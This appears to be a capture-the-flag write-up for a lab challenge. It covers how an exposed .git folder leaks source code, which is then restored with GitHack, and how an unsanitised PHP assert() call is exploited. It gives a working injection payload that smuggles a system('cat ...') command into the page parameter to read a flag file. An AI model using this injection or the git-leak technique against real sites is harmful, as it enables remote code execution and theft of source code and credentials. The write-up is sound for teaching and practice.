Defense - MFW all over the world

Inspection point: git vulnerability, code audit

Currently, a large number of developers use git for version control and automatic deployment of sites.If configured incorrectly, the .git folder may be deployed directly to the online environment.This caused the git leak vulnerability.

Compromise
An attacker could exploit this vulnerability to download all the contents of the git folder.If the folder contains sensitive information such as site source code, database account password, etc., the attacker may directly control the server.

Found that there is Git, it may be Git leak, directly /.git

There is indeed a git leak, so we use GitHack to restore it

Tool download (linux): git clone https://github.com/lijIEjIE/GitHack.git

Found flag.php in templates directory and found key code in index.php

The strpos() function looks for the first occurrence of ".." in $file.Returns false if not found

file_exists() function checks if $file exists

assert() will execute the characters in parentheses as code and return true or false

Find an assert() function, think that it is a code execution vulnerability, and $page does not have any control directly spliced, then use the assert() function to execute cat ./templates/flag.php to get the flag, then to destroy the originalThe assert structure enables us to achieve our goals.

It is found that the file variable is spliced ​​with the page variable we entered, and there is no filtering, we can insert the system function into this input character to execute the system command

Notice the use of single quotes and parentheses when calling file to limit the scope of file

Then we construct the following payload:

?page=') or system('cat ./templates/flag.php');//

After being passed in, it becomes:

$file="templates/') or system('cat ./templates/flag.php');//.php"

strpos() returns false, then use or to let it execute the system function, and then use " // " to comment out the following statement

assert("strpos('template/') or system('cat ./template/flag.php');//.php, '..') === false")

The underlined content is commented out, so the following statement is actually executed

strpos('template/') or system('cat ./template/flag.php');